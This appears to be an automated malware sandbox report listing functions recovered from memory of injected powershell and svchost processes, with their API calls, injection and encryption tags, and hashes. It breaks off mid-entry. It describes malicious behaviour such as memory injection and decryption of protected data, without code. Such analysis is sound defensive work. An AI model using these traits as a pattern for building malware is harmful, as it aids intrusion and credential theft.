                                                                                                                                        • Instruction Fuzzy Hash: 64F030751093868FC7128B14D960A51FFB17F57225B29C0C7D454CF193C776C886D751

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 07847D90 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fRl$(fRl$(fRl$(fRl
                                                                                                                                        • API String ID: 0-3082660454
                                                                                                                                        • Opcode ID: 2bfeb3df1d59b1a5e01cd40f66b4157b64451b1a90d5b1327ef85f1a2354df50
                                                                                                                                        • Instruction ID: a74bdd68d026dbbebd9ae563456739309e6215977459cb641ea981ae530674a5
                                                                                                                                        • Opcode Fuzzy Hash: 2bfeb3df1d59b1a5e01cd40f66b4157b64451b1a90d5b1327ef85f1a2354df50
                                                                                                                                        • Instruction Fuzzy Hash: 75717EB0A00209DFDB14CFA8C845E6ABBF2AF98714F148169D905EB755CFB6EC41CB91

                                                                                                                                        Executed Functions

                                                                                                                                        Function 007C02D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 007C0326
                                                                                                                                          • Part of subcall function 007C00A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 007C00CD
                                                                                                                                          • Part of subcall function 007C00A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 007C0279
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 007C0378
                                                                                                                                        • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 007C03E7
                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 007C0407
                                                                                                                                        • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 007C042E
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 007C0456
                                                                                                                                        • CloseHandle.KERNELBASE(?), ref: 007C0471
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000016.00000003.2709384909.00000000007C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_22_3_7c0000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                                        • String ID: ,
                                                                                                                                        • API String ID: 3867569247-3772416878
                                                                                                                                        • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                        • Instruction ID: 6a06a0295cf322222ed84172670d62b5a02d8c87c013352c2bc6b5b97b79d974
                                                                                                                                        • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                        • Instruction Fuzzy Hash: 6661FBB5900209EFDB20DFA5C884F9EBBB8FF08354F14851DFA59A7240D734AA51CBA0
                                                                                                                                        Function 007C00A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 007C00CD
                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 007C0279
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000016.00000003.2709384909.00000000007C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_22_3_7c0000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$AllocFree
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2087232378-0
                                                                                                                                        • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                        • Instruction ID: 269d3c22993fd585f119f8ee29a0362deae238479f6144135c650620ef1d013b
                                                                                                                                        • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                        • Instruction Fuzzy Hash: 89718D71A04249DFDB41CF98C985BEDBBF0BB09314F284099E465F7241C238AA91DFA4

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 007C0283 Relevance: .0, Instructions: 35COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000016.00000003.2709384909.00000000007C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_22_3_7c0000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                        • Instruction ID: 410228fb40bf06b3af9bef063ae9a057c89e553b4ea956436ccd885a9b3b2373
                                                                                                                                        • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                        • Instruction Fuzzy Hash: 47F04979A01200CF9B24CF09C548E95B7B6FB95720B6544ADD404AB261D3B8EE49CBE0

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:23.7%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:45%
                                                                                                                                        Total number of Nodes:20
                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                        execution_graph 418 155e72d1cf4 420 155e72d1d19 418->420 419 155e72d1fa1 420->419 427 155e72d15c0 420->427 422 155e72d1f98 CloseHandle 422->419 423 155e72d1f88 NtAcceptConnectPort 423->422 424 155e72d1e3a 424->422 424->423 430 155e72d1aa4 424->430 426 155e72d1f76 426->423 429 155e72d15f4 NtAcceptConnectPort 427->429 429->424 431 155e72d1aef 430->431 433 155e72d1b10 431->433 434 155e72d1870 431->434 433->426 435 155e72d1889 434->435 436 155e72d1949 435->436 437 155e72d1930 GetProcessMitigationPolicy 435->437 436->433 437->436 438 155e72d19b4 439 155e72d19c7 438->439 440 155e72d19fb 439->440 441 155e72d19e6 VirtualFree 439->441 441->440

                                                                                                                                        Callgraph

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00007DF416F9E910 Relevance: 18.1, APIs: 6, Strings: 4, Instructions: 563nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort$DuplicateHandlecallocfree
                                                                                                                                        • String ID: ,$,$H$H
                                                                                                                                        • API String ID: 2459737528-3578512806
                                                                                                                                        • Opcode ID: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                                        • Instruction ID: 8f50fe759896648d90abcf0b5d2b2962395a3d606380da29ce76b3ae8a794c7e
                                                                                                                                        • Opcode Fuzzy Hash: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                                        • Instruction Fuzzy Hash: 8002833061CF888BD764EF18D88466AB7E1FBD8315F50093EE58EC3291DA74E945CB82
                                                                                                                                        Function 00007DF416F9F180 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPathPort$NameName_freemalloc
                                                                                                                                        • String ID: $0$@
                                                                                                                                        • API String ID: 3298263305-2347541974
                                                                                                                                        • Opcode ID: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                                        • Instruction ID: 7a7e18efb37fc8c6d5fd4b8e861d8c9489ceb30437d3ba3f47ae14da9427db7f
                                                                                                                                        • Opcode Fuzzy Hash: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                                        • Instruction Fuzzy Hash: F451723491DB888FD764DF18D4867AA77E0FB89714F60452EE48EC2241EB78E485CB93
                                                                                                                                        Function 00007DF416F9F32C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 158nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPortfree
                                                                                                                                        • String ID: $0$@
                                                                                                                                        • API String ID: 2184535508-2347541974
                                                                                                                                        • Opcode ID: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                                        • Instruction ID: 4592fd48f7c221e8efb14494ce9c24f22914e1b87e2d46a63c609e42b8e506fa
                                                                                                                                        • Opcode Fuzzy Hash: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                                        • Instruction Fuzzy Hash: 18513A3060DB898FE764DF68D4547ABB7E5FB98315F20092EA48EC2250EB74D444CB52
                                                                                                                                        Function 00007DF416F90B80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$DirectoryFirstNextRemove
                                                                                                                                        • String ID: \
                                                                                                                                        • API String ID: 2722548352-2967466578
                                                                                                                                        • Opcode ID: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                                        • Instruction ID: 470bc47cb101cad61cd2a61dda2afa37822bf8ac9021949cb01844aad77bb039
                                                                                                                                        • Opcode Fuzzy Hash: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                                        • Instruction Fuzzy Hash: B6418F31608D888FDB45EF28DCC8ADA77B5FB94711F14066AE40BDA165EF38E844CB90
                                                                                                                                        Function 00007DF416F908CC Relevance: 6.2, APIs: 4, Instructions: 232processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Create$CodeDesktopExitTerminate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3114477661-0
                                                                                                                                        • Opcode ID: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                                        • Instruction ID: 9ffdf485e1cfb7ef4409cba0409212aa5bd223948aceced5f289cd2cabf0bebb
                                                                                                                                        • Opcode Fuzzy Hash: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                                        • Instruction Fuzzy Hash: A5714E3151CB888FE764DF28D8997ABB7E5FB94315F10062EE48AC3291EB78D441CB52
                                                                                                                                        Function 00007DF416F959B0 Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2502124517-0
                                                                                                                                        • Opcode ID: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                                        • Instruction ID: dd4b085282bf848b357fb7120cacaeb8899c770298860daf4b6600b488371f5d
                                                                                                                                        • Opcode Fuzzy Hash: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                                        • Instruction Fuzzy Hash: 5E318130618A488FE794EF28D8D879A77E5FB94324F10462BE45BC21D0EF38D985CB91
                                                                                                                                        Function 00007DF416F7286C Relevance: 3.3, APIs: 2, Instructions: 293threadinjectionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleSuspendThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1038686644-0
                                                                                                                                        • Opcode ID: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                                        • Instruction ID: eeaabd3be2eb8ceee30ee84923b00a1e604eac5c2b980802357a48b6c927562a
                                                                                                                                        • Opcode Fuzzy Hash: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                                        • Instruction Fuzzy Hash: 1191DB34A0CE594BEB689F18D49557A73F1FF59320F28816ED08FC7585EA38E842CB91
                                                                                                                                        Function 00000155E72D1CF4 Relevance: 3.3, APIs: 2, Instructions: 278nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000002.3234182550.00000155E72D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000155E72D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_2_155e72d0000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptCloseConnectHandlePort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3811980168-0
                                                                                                                                        • Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                        • Instruction ID: 2def1faa8e3e7db85ff1a098f277db78372bfb5b5ccfe15e189350892c4120fd
                                                                                                                                        • Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                        • Instruction Fuzzy Hash: B1914770118F488FD764EF58C8527E5B3E2FBC8311F11465ED58BCB696EB34AA428780
                                                                                                                                        Function 00007DF416F960F0 Relevance: 1.6, APIs: 1, Instructions: 114encryptionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CryptDataUnprotect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 834300711-0
                                                                                                                                        • Opcode ID: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                                        • Instruction ID: 7c3df492730de600b74abd2d20b99dc27c2a4a3e3de99ff30b66589af613c87f
                                                                                                                                        • Opcode Fuzzy Hash: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                                        • Instruction Fuzzy Hash: 4A318F3071CA488FE748EB68D85966BB7E1FB89351F50452EF44AC3291EA39D841C792
                                                                                                                                        Function 00000155E72D15C0 Relevance: 1.6, APIs: 1, Instructions: 76nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,00000155E72D1E3A), ref: 00000155E72D1654
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000002.3234182550.00000155E72D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000155E72D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_2_155e72d0000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                        • Opcode ID: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                        • Instruction ID: 968ff8cf6a7f98f53f4935379586f3b0fce97dfff4b5379b64312938e0a0070b
                                                                                                                                        • Opcode Fuzzy Hash: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                        • Instruction Fuzzy Hash: C4218471918F448FDB54DF58C4CA6A5F7E1FBA8305F140A2EE54AC7650D730D684CB41
                                                                                                                                        Function 00007DF416F9E25C Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                        • Opcode ID: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                                        • Instruction ID: dfb5d28c5c7793845018f379041ba3db5a90180b6d39fd7f6fac1e9898550fd9
                                                                                                                                        • Opcode Fuzzy Hash: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                                        • Instruction Fuzzy Hash: D0F0BD30E1CB898FDB64EF2CD489B5977E1FB99314F504519E84CC3245EA34D8808B86
                                                                                                                                        Function 00007DF416F9E094 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                        • Opcode ID: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                                        • Instruction ID: 8c586ba87f256305ecad534a811b39f174bbd1bca53164b851a145a261bbda06
                                                                                                                                        • Opcode Fuzzy Hash: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                                        • Instruction Fuzzy Hash: 6EF05F34A1CBC88FD7A0EF688585B9ABBE0BB9A354F54591AE8CCC3211D73594848B53
                                                                                                                                        Function 00007DF416F9E3E8 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                        • Opcode ID: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                                        • Instruction ID: a331a7f035c8e8b987899c625f0e8efe122751935c1ec06d815e586d4c59ab47
                                                                                                                                        • Opcode Fuzzy Hash: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                                        • Instruction Fuzzy Hash: B8E09B35618A488FDB14DF98C8C15AAB7F0FBD8314F104D7AF84BCB164D264D688CA52
                                                                                                                                        Function 00007DF416FFD66C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSystemInfo.KERNELBASE(?,00007DF41700EF2F,?,?,?,?,00000000,00000000), ref: 00007DF416FFD689
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                        • Opcode ID: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                                        • Instruction ID: 6fbc52e224b320568af5f217f53e35515df790cd6ab1fd55325659c84fce8c79
                                                                                                                                        • Opcode Fuzzy Hash: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                                        • Instruction Fuzzy Hash: FCE04F31614C0887F349FB31DC9A4E77361FBA6310B904663D807810E6FE2DA24ACA91
                                                                                                                                        Function 00007DF416F9E170 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                        • Opcode ID: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                                        • Instruction ID: 43b1047ca147c099cf12233fe800cb47bda50aefe3c7b39299e72d8e2cd7169e
                                                                                                                                        • Opcode Fuzzy Hash: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                                        • Instruction Fuzzy Hash: 6FD05E30E28A8D4BDA14AB28884071637E1FB9A318FA04614E44DC3200F23CE4C08782
                                                                                                                                        Function 00007DF416F9E3C8 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                        • Opcode ID: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                                        • Instruction ID: 9a30dc6fa4260b85e0ce072f7a42e06fed9ce9581af2f2b2bd1df8a795f8b826
                                                                                                                                        • Opcode Fuzzy Hash: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                                        • Instruction Fuzzy Hash: 03C08C00E28C0E5AEB05AABA8C82B1A24A0AF4C328F900020F80AC2190F44CE4C4C3A2
                                                                                                                                        Function 00007DF416F9E150 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF416F9C0F7), ref: 00007DF416F9E160
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                        • Opcode ID: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                                        • Instruction ID: 71665627c9cdda79a0fd3d48f1eb5b38d6cbf9ccce15d1fb65a7451cd6fb3a3a
                                                                                                                                        • Opcode Fuzzy Hash: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                                        • Instruction Fuzzy Hash: 69C08C20E58D0F8FEA087BAA4C8030621A0AF4EB28F900011A40AC2180F80CE4C083A2
                                                                                                                                        Function 00007DF416F74998 Relevance: 4.9, APIs: 2, Strings: 1, Instructions: 354COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: freemalloc
                                                                                                                                        • String ID: x
                                                                                                                                        • API String ID: 3061335427-2363233923
                                                                                                                                        • Opcode ID: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                                        • Instruction ID: 2a479ad614ed84b8d450eea77d7cc3be38d28e357641ab081031063a0a62ea9c
                                                                                                                                        • Opcode Fuzzy Hash: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                                        • Instruction Fuzzy Hash: EDB1AC31A1DE884AE729E71894956EBB3E1FFD5310F60056EE0CFC2183ED38E506C696
                                                                                                                                        Function 00000155E73E33B0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 350memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.2840753240.00000155E73E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000155E73E0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_155e73e0000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID: x
                                                                                                                                        • API String ID: 3298025750-2363233923
                                                                                                                                        • Opcode ID: 66731f1b482563bc89d9877d94cc40398e3a5f4cddffed67c8b36e4cd925d657
                                                                                                                                        • Instruction ID: 247dfd37bbdd3170fef7ec34e9a430851f058f96579b0e95a4985c0197abed88
